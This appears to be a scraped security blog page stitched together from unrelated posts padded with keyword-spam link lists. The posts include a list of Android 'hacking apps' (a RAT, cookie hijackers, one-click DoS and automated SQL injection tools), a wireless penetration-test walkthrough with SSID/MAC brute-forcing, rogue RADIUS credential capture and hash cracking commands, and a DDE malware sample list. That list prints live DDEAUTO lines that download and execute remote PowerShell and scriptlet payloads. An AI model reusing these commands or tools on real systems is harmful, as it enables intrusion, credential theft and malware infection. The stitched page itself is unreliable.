Welcome to my blog. You can with your friends and collect the amazing picture from here and plz click on the ads by google

Tuesday, June 30, 2020

Top 7 Hacking Websites 2018

  • Metasploit: Find security issues, verify vulnerability mitigations & manage security assessments with Metasploit. Get the worlds best penetration testing software now.
  • Exploit DB: An archive of exploits and vulnerable software by Offensive Security. The site collects exploits from submissions and mailing lists and concentrates them in a single database.
  • HackRead: HackRead is a News Platform that centers on InfoSec, Cyber Crime, Privacy, Surveillance, and Hacking News with full-scale reviews on Social Media Platforms.
  • Packet Storm: Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers.
  • Hacked Gadgets: A resource for DIY project documentation as well as general gadget and technology news.
  • The Hacker News: The Hacker News — most trusted and widely-acknowledged online cyber security news magazine with in-depth technical coverage for cybersecurity.
  • KitPloit: Leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security.
Posted by at No comments:

Friday, June 12, 2020

Top 20 Best Free Hacking Apps For Android |2019|

 20 Best Free hacking apps For Android |2019|. 

Android is now one of the most popular operating systems. So, hackers have also started using Android devices for their tasks. Now Android devices are used for penetration testing and other hacking activities including IT security administrator, Wi-Fi hacking and network monitoring. There are several hacking apps or Android devices. So, we have curated a list of best hacking apps for Android.


Before you start using these apps, you must take a backup of your important data. I also recommend the use of these apps on a separate device. Using this on your primary phone is not recommended. It is because many of these apps require a rooted device and app can also harm your phone.


Note: Hacking apps can be used for educational and malicious purpose. But we never encourage malicious operations. We are listing the apps here just for educational purpose. You should only use these apps to learn. We do not support any unethical use of these apps.

1.  AndroRAT

AndroRAT stands for Android RAT. RAT is the short form of Remote Administrative Tool and it allows an attacker to remotely control and fetch information from a device. AndroRAT does the same thing. It has a server developed in Java/Swing but the Android application has been developed in Java Android.

AndroRAT allows you to connect information like call logs, contacts, messages, location and more. You can remotely monitor sent and received messages send texts, use the camera, open a URL in the browser, make phone calls and remotely monitor the device.

The connection to the server can be triggered by an SMS or a call. From the server GUI, you can check all the connected clients and access information.

As the app allows silent remote access, it is not available on Play Store.

                Download APK

2. zANTI

zANTI is a known penetration testing suite of applications you can install locally on Android smartphone. This tool brings scanning tools Diagnostic features and Reporting tools. You can use this malicious software to attack a network and check for any loopholes in your network. This tool is used to test redirect and SSL stripping attacks. You can edit request and response messages from web servers, the host takes websites from your Android phone and more.


                  Download 

3. FaceNiff

FaceNiff is another good Android hacking that allows you to intercept the traffic of your WiFi network. You can use this tool to snoop what people are doing on the network you are. You can snoop on services like Facebook, Twitter, Amazon, YouTube and more. This is one of the notable too for steal cookies from the WiFi network and gives the attacker unauthorized access to other people's account.

This app requires a rooted device. So, you can only use the app if you have a rooted phone.

Download APK

4. Droidsheep

Droidsheep is also a similar app that helps security analysts understand what is happening in your Wi-Fi network. Like Face Sniff, this app can also hijack the web session profiles over a network and supports most of the services and websites.

The primary difference between Droidsheep and FaceSniff is that Droidsheep works with almost all the websites while FaceSniff has limited support.

                     Download APK

5. Hackode

Hackode is another good hacking apps for Android. It is not a single app but a collection of tools for ethical hackers and penetration testers. The app comes with three modules including Reconnaissance, Scanning and Security Feed. You can use this app for SQL Injection, Google hacking, MySQL Server, Whois, Scanning, DNS Dif, DNS lookup, IP, MX Records, Security RSS Feed, Exploits etc.

The app is still in beta, but available in Play Store.

                  Download Here

6. cSploit

cSploit is also a good security tool for Android. It comes with several options like cracking Wi-Fi password, installing backdoors, finding vulnerabilities and their exploits. If you are looking for a good hacking app or hacker app for Android, you should try this one for sure.

                  Download APK

7. DroidBox

DroidBox is also a similar kind of app that allows you to do the dynamic analysis of Android applications. You can use this app to get information like hashes of APK package, network traffic, SMS & phone calls, Incoming/outgoing network data, Listing broadcast receivers and more.

                    Download

8. Nmap

If you are into security or hacking, I am sure you already know the name of this too. Like the desktop tool, Nmap for Android also allows you to scan

It works on both on non-rooted and rooted phones. If you are a beginner, you should try this app and learn from it.

                      Download

9. SSHDroid

SSHDroid is SSH tool developed for Android. It lets you connect to a remote computer and run terminal commands, transfer and edit files. The app also provided features like shared-key authentication, WiFi autostart whitelist, extended notification control etc,

This app is available on Play Store.

                    Download

10. Kali Linux NetHunter

Kali Linux NetHunter is an open source penetration testing platform for Android. It officially supports Nexus and OnePlus devices. It provides the ultimate penetration testing platform that allows you to perform a wide range of attacks.

                     Download

11. APKInspector

APKInspector allows you to perform reverse engineering on an APK. you can use this to get a deep insight or APK and get the source code of any Android app. You can do modifications in the APK and visualize the DEX code to erase the credits and license.

                 Download APK

12. Shark for Root

Shark for Root is an advanced hacking tool for security experts and hackers. It can work as a traffic snipper. You can use the tcpdump command on rooted devices. It works on Wi-Fi, 3G, and FroYo tethered mode.

                    Download

13. dSploit

dSploit is an Android network penetrating testing suit. You can download and install it on your device to perform network security testing. It supports all Android devices running on Android 2.3 Gingerbread or higher. You need to root this phone for using the app. After rooting the phone, you need to download BusyBox from Google Play Store

The app comes with several modules including Port Scanner, Inspector, RouterPWN, Trace, Login Cracker, Packet Forger, Vulnerability Finder, and MITM.

                      Download

14. WPScan

WPScan is a WordPress vulnerability scanner for Android. This app is used to scan WordPress based websites and find possible vulnerabilities. WPScan is a popular desktop tool but this WPScan for Android is not related to that. So, do not think of it as an official WPScan app.

                      Download

15. Network Mapper

Network Mapper is a network scanner tool for network admins. It used to scan the network, lists all devices connected and find Open ports of various servers like FTP servers, SSH servers, SMB servers etc on the network. The tool is available on Play Store.

                     Download

16. Andosid

Andosid is like LOIC for the desktop. This tool is used to perform DOS attacks from Android mobile phones. You can use this tool to set a target URL and perform a DOS attack in one click. The tool will start flooding target URL with fake requests.

                     Download

17. DroidSQLi

DroidSQLi app allows attackers to perform SQL Injection on a target URL. You just need to find a target URL and this tool will start the fully automated SQL Injection attack.

                     Download

18. AppUse

AppUse is a Virtual Machine developed by AppSec Labs. It is a freely available mobile application security testing platform that comes with lots of custom made tools by AppSec Labs. If you want to sue your Android phone as your penetration testing tool, this one is for you.

                   Download

19. Network Spoofer

Network Spoofer is also a good hacking app for android. It lets you change the website on other people's computer from your Android phone. Connect to a WiFI network and then choose a spoof to use with the app. this tool is to demonstrate how vulnerable a network is. Do not try this on any unauthorized networks.

                 Download

20. DroidSheep Guard

As the name suggests, DroidSheep Guard works against DroidSheep. It monitors Android devices' ARP-table and tries to detect ARP-Spoofing attack on your network. It does not require a rooted device.

               Download


@EVERYTHING NT


Related news
  1. Hacking Bluetooth
  2. Pentest Magazine
  3. Pentest Framework
  4. Pentest Practice Sites
  5. Pentesting
  6. Hacking Device
  7. Hacker Tools
  8. Hacking Hardware
  9. Pentest Azure
  10. Hacker Forum
  11. Hacking Lab
  12. Pentest Hardware
  13. Pentest Firewall
  14. Pentest News
  15. Hacking Health
  16. Pentest Aws
  17. Pentest Lab Setup
  18. Pentest Ubuntu
  19. Hacker On Computer
  20. Hacking Process
Posted by at No comments:

Thursday, June 11, 2020

Administración Remota De Servidores Desde Android

Sería muy util poder administrar todos nuestros servidores desde la palma de la mano.

Sin embargo una shell linux, no es viable en el teclado de un teléfono incluso de un tablet, sobretodo porque hay que escribir muchos símbolos, por ejemplo el guión, y estos teclados están pensados más bien para texto.

Pues bien, de esta necesidad surgió la aplicación SSHControl:


SSHControl

Esta problematica la he solucionado a base de utilizar nevegadores y estructurar los outputs para no acumular excesiva información en la pantalla.

- Navegador de ficheros
- Navegador de procesos
- Navegador de conexiones
- Navegador de logs
- Navegador de drivers de kernel

Esto permite administrar múltiples servidores con un solo dedo :)

Controlar la seguridad de sus servidores ahora es bastante sencillo y ágil, por ejemplo con solo hacer un "tap" encima de un usuario, podemos ver sos procesos asociados, con hacer otro tap en un proceso podemos kilearlo, ver mas info etc ..
Con hacer un tap encima de una apliacción, vemos sus conexiónes, con un tap en una conexión podemos agregar una regla de filtrado en el firewall, etc ..


En la siguiente versión habilitaré la opción de "Custom Commnands", la cual es muy util,
cada administrador o usuario linux, tiene una serie de comandos que repite con mucha frecuencia,
bien pues esta opción permite pre-programar estos comandos habituales, de manera que puedes lanzarlos con un simple tap.

En el roadmap tengo pensadas nuevas funcionalidades muy útiles :)

Aqui os dejo algunas capturas de pantalla:







Related links
  1. Pentest Smtp
  2. Hacking Software
  3. Pentest Book
  4. Pentester Academy
  5. Pentest+ Vs Oscp
  6. Pentest Tools Free
  7. Pentest App
  8. Pentest Distro
  9. Hacking Resources
  10. Pentest Blog
  11. Hacking Google
Posted by at No comments:

Top Users Command In Linux Operating System With Descriptive Definitions


Linux is a command line interface and has a graphical interface as well. But the only thing we should know how we interact with Linux tools and applications with the help of command line. This is the basic thing of Linux.  As you can do things manually by simple clicking over the programs just like windows to open an applications. But if you don't have any idea about commands of Linux and definitely you also don't know about the Linux terminal. You cannot explore Linux deeply. Because terminal is the brain of the Linux and you can do everything by using Linux terminal in any Linux distribution. So, if you wanna work over the Linux distro then you should know about the commands as well.
In this blog you will get a content about commands of Linux which are collectively related to the system users. That means if you wanna know any kind of information about the users of the system like username passwords and many more.

id

The "id" command is used in Linux operating system for the sake of getting knowledge about active user id with login and group. There may be different users and you wanna get a particular id of the user who is active at that time so for this you just have to type this command over the terminal.

last

The "last" command is used in Linux operating system to show the information about the last logins on the system. If you forget by which user id you have logged in at last time. So for this information you can search login detail by using this command.

who

The "who" command is used in Linux distributions to display the information about the current user which a an active profile over the Linux operating system. If you are in the system and you don't know about that active user and suddenly you have to know about that user detail so you can get the info by using this command.

groupadd

The "groupadd admin" is the command which is used in Linux operating system to add a group in the Linux system to gave the privileges to that group.

useradd

The "useradd" command is used in Linux operating system to add user or users to a specific group. If you wanna add a user name Umer so for this matter you just have to write a command i.e. useradd -c "Umer".

userdel

The "userdel" command is used in Linux operating system for the purpose to delete any user or users from the particular group present in the linux operating system. For example "userdel Umer" this command will delete the user named Umer.

adduser

The "adduser" command is a simple command used to create directly any user in the system. There is no need to make a group for this. You just have to type the command with user name like adduser Umer, it will created a user by name Umer.

usermod

The "usermod" is a command used in Linux operating system to modify the information of any particular user. You can edit or delete information of any particular user in the Linux operating system.


Related word


Posted by at No comments:

Thank You To Volunteers And Board Members That Worked BlackHat Booth 2019

The OWASP Foundation would like to thank the OWASP Las Vegas Chapter Volunteers for taking the time out of their busy schedule to give back and volunteer to work the booth at BlackHat 2019.  It was great meeting our Las Vegas OWASP members and working with Jorge, Carmi, Dave, and Nancy.  
Also, take a moment to thank Global Board Members Martin Knobloch, Owen Pendlebury, and Gary Robinson for also working the booth and speaking with individuals and groups to answer questions on projects and suggestions on the use of our tools to address their work problems.
OWASP can not exist without support from our members.  

Read more


  1. Pentest
  2. Hacking Jacket
  3. Hacking Simulator
  4. Pentestlab
  5. Pentest Gear
  6. Pentest Checklist
  7. Hacking Page
  8. Hacker Website
  9. Hacking 3Ds
  10. How To Pentest A Network
  11. Pentest Basics
  12. Hacking The Art Of Exploitation
  13. Pentest Magazine
  14. Pentest Companies
  15. Hacker Keyboard
  16. Pentesting
  17. Hacker Keyboard
Posted by at No comments:

Wireless Scenarios Part 1: EAP-Radius JTR Hashcat, SSID MAC Issues And More

Intro: 
I have been on a number of wireless engagements again lately and much like the wireless blog i wrote over a year ago i am trying various combinations of techniques and tools in conjunction to gain access to networks. I will show a range of tools and techniques mostly as a reminder to myself. The format will be scenario based on what i have been seeing while testing.  Some of these tools include JTR/Hashcat with specialized rulesets, mdk3 for SSID/MAC bruteforcing, evil access points for bypassing guest networks, DNS redirection/tunneling as well as radius-wpe attacks etc... This will be a 2 part blog, first blog being more Pre-Auth attacks and the second blog being more client attacks.



Finding Hidden SSID's and Limited user network attacks:
Recently i have been on a lot of tests where administrators think its a wonderful idea to hide their SSID's. Administrators feel that if they hide their SSID's they are magically secure. While Cloaked SSID's may pose a slight problem it's not a security feature. Especially when hiding WEP encrypted networks. One issue that keeps coming up is hidden networks with NO clients thus no probe request/response traffic available to passively capture an SSID. Without clients you can't de-authenticate and force reconnections requests with SSID's. To top that off administrators are also running another trivial security feature known as MAC filtering. While MAC filtering is also easy to bypass, again there are no clients on the network so we must come up with strategies to figure out both the SSID's and the possible client MAC addresses. Lets start by addressing the SSID issue.
SSID's can generally be seen in the Beacon traffic. However, if MAC cloaking or hidden SSID's are enabled on your access point they are stripped from the beacon traffic. Striping the beacons of SSID's is usually not a problem if there are clients looking to join the network. As the SSID's must be sent in probe traffic to successfully inquire about joining the network, and SSID's are than easily obtained. Thus why tools like kismet can passively discover the correct SSID given a bit of time and a few clients probing for the hidden network. But, what happens if there is no client traffic?
So the actual scenario i was presented with recently was a Cloaked SSID on a limited use network running WEP, which had a MAC filtered client device. This device would attach to the network once a day for a limited amount of time. So the first piece of the puzzle would be figuring out the SSID for later use then tackling the rest of the problem.

We start with a nice little tool called MDK3 which can be used to send out mass SSID requests in either dictionary style or bruteforce in order to determine an SSID. Lets start with the simple syntax then get into some more fine tuned strategies for determining SSID's based on the mind of the sysadmin.

There are 2 modes i have been using, one is dictionary mode and the other bruteforce mode, i would always start with dictionary because its faster. If a dictionary gives no resultes then move to bruteforce techniques. Also have your Airodump-ng/Kismet running during the attack and if the SSID is found it should apear in there as well as your MDK3 results window. You can get your target BSSID value from airodump along with useful information sometimes regarding length of a hidden SSID value which can be used in fine tuning bruteforcing. MDK3 will automatically pick the correct length and then begin bruteforcing based on that length value:

Below is an example of SSID Length Output: 
CH 6 ][ Elapsed: 8 s ][ 2012-03-01 21:08
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:24:A5:6F:2E:D5 -59 5 0 0 5 54 WEP WEP length: 12
00:1A:A1:05:E8:20 -61 2 0 0 3 48 . WEP WEP length: 1
00:24:A5:6F:37:9F -64 2 0 0 5 54 WEP WEP length: 12

You will notice example output above says that one SSID is of length 12 and another is of length 1, these are the SSID perceived length values based on values in the packet capture. Not always accurate because these values are just Null place holder values and not always set accurately. Essentially one SSID packet above has a one null value while the other packet has 12 null values as placeholders. If a length of 1 is present you may have to start at 1 and go through the whole range of brute forcing. If the length is known then you can start and end at 12 in this case shortening the full bruteforce time considerably.

Attack Modes and Info:
Dictionary Mode:
./mdk3 [Interface] p -c 1 -t [BSSID] -f [dictionary] -s 100

Bruteforce mode:
./mdk3 [Interface] p -c 1 -t [BSSID] -b u -s 100

Above Switch mappings are defined as the following:
b = bruteforce also can add a character set b [charset]
s = packet speed
c = channel
f = ssid dictionary file

I first tried a regular dictionary attack of common words:
ficti0n:# mdk3 mon0 p -c 1 -t 00:01:55:B1:A3:A5 -f english.txt
channel set to: 1
SSID Wordlist Mode activated!
Waiting for beacon frame from target...
Sniffer thread started
Found SSID length 1, usually a placeholder, no information about real SSIDs length available.
Trying SSID:
Packets sent: 1 - Speed: 1 packets/sec
Got response from 03:F0:9F:17:08:32, SSID: "Secure_Access"
Last try was: (null)
Trying SSID: beauty
Packets sent: 167 - Speed: 166 packets/sec
Got response from 03:F0:9F:17:08:33, SSID: "Guest_Access"
Last try was: (null)
Trying SSID: bianca
Trying SSID: winnie
Trying SSID: isabella
Trying SSID: sierra
Trying SSID: 00000000
Trying SSID: dancer1
Packets sent: 32507 - Speed: 376 packets/sec
Got response from 00:3B:10:47:33:32, SSID: "wow"

I began with a dictionary against a network address i got from my initial airodump-ng. On my first MDK3 run i found one new access point named "wow" but i didnt find the target AP's SSID. If you look at the above MDK3 output there are 2 other networks with similar formats which may reflect our target networks format. Below you will see a similar format.
  • Guest_Access
  • Secure_Access
Creating a Custom dictionary based on observations:
If the target company has a repeating SSID format we can create our own dictionary file. According to the above output the format is [Word]_Access, we can take advantage of this by creating a new list with python using the company format. Break open your python editor and create a quick script to parse the english dictionary in the proper format for our attack by uppercasing every dictionary word and appending the word "Access".

#--------------------------------------------------------------
#!/usr/bin/python

dictionary = open("rockyou-75.txt", "r")
SSID_List = open("SSID_List.txt", "a")


for word in dictionary:
word = str.capitalize(word) + "Access"
SSID_List.write(word)


SSID_List.close()
dictionary.close()

#----------------------------------------------------------------

I then ran MDK3 again with my modified list. When this was done I then was able to get a response from MDK3 and determine the SSID of the target network, shown below.

Got response from 00:01:55:B1:A3:A5, SSID: "Secret_Access"


Luckily i didn't have to resort to a true bruteforce attack although the format is shown above for completeness. 



MDK3 MAC address Bruteforce:
The next issue is that of determining a valid MAC address on a network without any known clients, this can also be done with MDK3 and bruteforce mode.  I would suggest looking at other client MAC addresses on the guest or corporate networks as a starting point. Then use those vendor startpoints as your bruteforce values. So if for example you know a bit about the company based on other network MAC values you can use this knowledge in your brute forcing with the -f switch. Below is a basic command ouput for bruteforcing MAC address filters.


ficti0n:# mdk3 mon0 f -t

Trying MAC 00:00:22:00:00:00 with 100.0000 ms timeout at 0 MACs per second and 0 retries
Trying MAC 00:00:22:00:00:00 with 100.0000 ms timeout at 0 MACs per second and 1 retries
Packets sent: 2 - Speed: 1 packets/sec

Found a valid MAC adress: 00:00:22:00:00:00
Have a nice day! :)

Mdk3 -fullhelp output:
--------------------------------------------------------------

MAC filter bruteforce mode
This test uses a list of known client MAC Adresses and tries to
authenticate them to the given AP while dynamically changing
its response timeout for best performance. It currently works only
on APs who deny an open authentication request properly
-t
Target BSSID
-m
Set the MAC adress range to use (3 bytes, i.e. 00:12:34)
Without -m, the internal database will be used
-f
Set the MAC adress to begin bruteforcing with
(Note: You can't use -f and -m at the same time)
---------------------------------------------------------------------

I wasn't aware of the above technique at the time of testing but i did give it a try on a local Access Point and found a useable mac address under contrived scenarios. So this was worth noting as I found almost zero mention of it when searching around. Also note that some access points do not properly handle the authentication scenarios in which case the above technique will not work correctly. Usually the user sends an auth request and then the AP sends an auth response denoting success or failure along with an error code, but MAC filering is not part of the normal standard so results will vary regarding error codes. This is AP functionality independent. When it does work it gives you a little smily face and says it found a useable MAC address [SHOWN ABOVE] . Unfortunately in my penetration test I was stuck waiting for a client to come online to get a useable MAC address. Below are a few ideas for the rest of the scenario.


Depending on the location and use of the limited connectivity device there are a few options available for retrieving the WEP key. Networks with hidden SSID's have clients who are always probing for hidden networks whether onsite or remote. You could attack a client directly via a Cafe Latte attack. A Caffe Latte attack woud attack a client with a fake access point and gratuitas ARP requests to discover the WEP key of "Secret_Access" by flooding the client with ARP requests it responds to, generating enough traffic to derive the WEP key. This technique is useful now that you know the SSID, especially if the device is being used at the local coffee shop. I will take a look at this attack in the next blog when focusing on client based attacks.

Caffe Latte was not a good option for me because the device appears online for a short period of time and might not be available either offsite at a coffee shop or even locally long enough to generate enough traffic to crack the network. In this test I however didn't have enough time to see client actually get online but had I see the client get online I would have noted his MAC address and then configured a chop chop or fragmentation attack against the network whether the client was available or not all i would really need is one data packet. I will not illustrate this whole technique as it is fully covered in the following link Cracking WEP with no Clients.


Cracking Radius /PEAP/TTLS Hashes: (Post EAP Attack)
This is about attacking hashes from WPE Radius attacks, but just as a reference before we start here is a quick radius attack setup guide without going into to much detail.


Steps to Setup WPE attack
  1. Install the following freeradius server and WPE patch. http://blog.opensecurityresearch.com/2011/09/freeradius-wpe-updated.html
  2. Start your WPE server by typing 'radiusd'
  3. Tail your log file so you can see incoming credentials 'tail -f /usr/local/var/log/radius/freeradius-server-wpe.log
  4. Setup an access point with similar settings as to what you are seeing in airodump or wireshark essentially this will be a WPA Enterprise with AES and a default secret of 'test' which is set in the WPE installed package by default so it can talk between the AP and the radius server. You will also need to run an ifconfig on your radius server box so you know what address to point the AP too.
  5. Optionally you can use hostAP instead of a physical enterprise AP setup.

Use one of your local computers to connect to the FreeRadius wireless network and type in a fake username/password to grab an example hash. If you dont see your hash output in the logfile then double check all your ip addresses and insure your server is running. In a real attack you would wait for clients to attach to your Access point and the credentials will be forwarded to your FreeRadius-WPE server. Once this is done the fun begins and also where we will start in our attack scenario.

Formatting hashes:
Your hashes can come in a few formats, they might come back as PAP responses in which case they will be plain text passwords. Plaintext PAP can sometimes be a result of mobile devices sending paswords. Otherwise your attack will result in MSChap password challenge/response hashes. Once you receive your MSChap hashes they have to be formated in a specific way in order to crack them. Here is an example hash and the proper format to use before trying to crack the hashes.

Example Hash:
mschap: Mon Feb 05 19:35:59 2012
username: test
challenge: b3:f8:48:e9:db:02:22:83
response: 15:36:d7:e9:da:43:1f:5f:d2:4b:51:53:87:89:63:b7:12:26:7c:a8:f7:ea:9c:26

Formated for john:(username::::response:challenge)
test::::1536d7e9da431f5fd24b5153878963b712267ca8f7ea9c26:b3f848e9db022283

Tool to automate this: (Tool Link)
One of my friends wrote a python script that will take your freeradius-server-wpe.log as input and format out all of the hashes one per line.. The script output can be fed directly into John The Ripper(JTR).

JTR Cracking and Custom Rulesets:
One way to crack these hashes is to use JTR with a bunch of dictionary attacks and if that fails procede from there with custom korelogic rulesets. Check out preceding link for more info on password cracking techniques which can be employed in addition to this blog. Below I will reiterate a few points on setting up JTR with custom rulesets from the Defcon challenge in 2010 based on the previous link and then how to parse them out and use them.

The first thing to note is that the format of the hashes you get from WPE will generally be considered NETNTLM within JTR so we will have to specify that as well as the wordlists we would like to use to start.

Dictionary attacking first:
First go into your JTR directory and try to crack with some dictionaries of your choosing:
ficti0n:# cd Desktop/Tools\ /john/run
ficti0n:# ./john --wordlist=wordlists/wpa.txt --format=NETNTLM JohnFormat.txt

Loaded 1 password hash (NTLMv1 C/R MD4 DES [netntlm])
test             (test)
guesses: 1  time: 0:00:00:00 100.00% (ETA: Tue Mar 20 19:29:31 2012)  c/s: 692441  trying: test

Custom Rules: korelogic rulesets (Link)
If the cracking fails on all of your wordlists then try installing custom rulesets with the following sequence of commands meant do download and then append the rules to the current john file. The following command can also be found at the above Korelogic link.
ficti0n:# wget http://contest-2010.korelogic.com/rules.txt
ficti0n:# cat rules.txt >> john.conf


Once this is done you can directly specify any rule in the file similar to the following:
ficti0n:# ./john --wordlist=wordlists/english.txt --format=NETNTLM --rules:KoreLogicRulesAppendNum_AddSpecialEverywhere johnFormat.txt


Or if you are time independent just let them all rip and go on vacation and check the results when you get back LOL
ficti0n:# for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --wordlist=wordlists/english.txt --format=NETNTLM --rules:${ruleset} JohnFormat.txt; done


Hashcat rulesets and building pasword files:
Another way to build complex password files is to use tools like HashCat with supplied password rules and pipe it out to STDOut, either into a file or the STDIn of other cracking programs like John the Ripper. There is a rules folder in HashCat which has a number of rules provided by default.


Available Hashcat Rules:
ficti0n:# ls
best64.rule      generated.rule   passwordspro.rule  T0XlC.rule     toggles3.rule
combinator.rule  leetspeak.rule   perfect.rule       toggles1.rule  toggles4.rule
d3ad0ne.rule     oscommerce.rule  specific.rule      toggles2.rule  toggles5.rule

Creating Passwords with Hashcat and a dictionary:
ficti0n:# ./hashcat-cli32.bin -r rules/passwordspro.rule ../wordlists/cain.txt --stdout

You can also pipe passwords directly into JTR from hashcat output but its really slow so I suggest you make a world list then load it up with --wordlist, but the example is shown below.

Piping Hashcat password rules into JTR: (really slow)
ficti0n:# ./hashcat-cli32.bin -r rules/passwordspro.rule ../wordlists/rockyou-75.txt --stdout |/pentest/passwords/john/john --format=NETNTLM JohnFormat.txt --stdin


I hope someone finds my above notes useful, I am going to write up some client side attack stuff as well and post it up here... Let me know if you have any questions or need more clarification on anything covered in the blogs. 

More information


Posted by at No comments:

DDE Command Execution Malware Samples






Here are a few samples related to the recent DDE Command execution






Reading:
10/18/2017 InQuest/yara-rules 
10/18/2017 https://twitter.com/i/moments/918126999738175489 


Download


File information
List of available files:
Word documents:
bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb
a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428
b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568
9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862
7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280
313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065
9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d
8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184
11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13
bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9

Payload 
8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf
2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c
316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea
5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f
fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669 


File details with MD5 hashes:
Word documents:
1. bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb EDGAR_Rules.docx
bcadcf65bcf8940fff6fc776dd56563 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://pastebin.com/raw/pxSE2TJ1')) ")

2. 1a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428 EDGAR_Rules_2017.docx
 2c0cfdc5b5653cb3e8b0f8eeef55fc32 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://trt.doe.louisiana.gov/fonts.txt')) ")

3 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx
8be9633d5023699746936a2b073d2d67 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://104.131.178.222/s.ps1');powershell -Command $e. 

4. 9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862 Plantilla - InformesFINAL.docx
78f07a1860ae99c093cc80d31b8bef14 ( DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe $e=new-object -com internetexplorer.application; $e.visible=$true; $e.navigate2(' https://i.ytimg.com/vi/ErLLFVf-0Mw/maxresdefault.jpg '); powershell -e $e " 

5. 7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280 
 aee33500f28791f91c278abb3fcdd942 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://www.filefactory.com/file/2vxfgfitjqrf/Citibk_MT103_Ref71943.exe');powershell -e_

6. 313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065 Giveaway.docx
507784c0796ffebaef7c6fc53f321cd6 (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe" "/c regsvr32 /u /n /s /i:\"h\"t\"t\"p://downloads.sixflags-frightfest.com/ticket-ids scrobj.dll" "For Security Reasons")


7. 9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d  Filings_and_Forms.docx
47111e9854db533c328ddbe6e962602a (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden -C $e=(new-object system.net.webclient).downloadstring('http://goo.gl/Gqdihn');powershell.exe -e $e # " "Filings_and_Forms.docx")

8. 8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184 ~WRD0000.tmp
47111e9854db533c328ddbe6e962602a


9. 11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13 ~WRD0003.tmp
d78ae3b9650328524c3150bef2224460


10. bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9 DanePrzesylki17016.doc
5786dbcbe1959b2978e979bf1c5cb450


Payload Powershell

1. 8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf fonts.txt

2 2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c - powershell script from hxxp://citycarpark.my/components/com_admintools/mscorier

Payload PE

1. 316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea Citibk_MT103_Ref71943.exe
3a4d0c6957d8727c0612c37f27480f1e

2. 5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f FreddieMacPayload
 4f3a6e16950b92bf9bd4efe8bbff9a1e

3. fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669 s50.exe  Poland payload
09d71f068d2bbca9fac090bde74e762b








Message information


For the EDGAR campaign
bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb

 Received: from usa2.serverhoshbilling.com (usa2.serverhoshbilling.com [209.90.232.236])
by m0049925.ppops.net with ESMTP id 2dhb488ej6-1
(version=TLSv1.2 cipher=ECDHE-RSA-AES256-GCM-SHA384 bits=256 verify=NOT)
for <snip>; Wed, 11 Oct 2017 00:09:20 -0400
Received: from salesapo by usa2.serverhoshbilling.com with local (Exim 4.89)
(envelope-from <EDGAR@sec.gov>)
id 1e28HE-0001S5-Ew
for <snip>; Wed, 11 Oct 2017 00:05:48 -0400
To: <snip>
Subject: EDGAR Filings
X-PHP-Script: roofingexperts.org/wp-content/themes/sp/examples/send_edgar_corps.php for 89.106.109.106, 162.158.90.75
X-PHP-Originating-Script: 658:class.phpmailer.php
Date: Wed, 11 Oct 2017 04:05:48 +0000
From: EDGAR <EDGAR@sec.gov>
Reply-To: EDGAR <EDGAR@sec.gov>
Message-ID: <7608a3de5fe6c9bf7df6782a8aa9790f@roofingexperts.org>
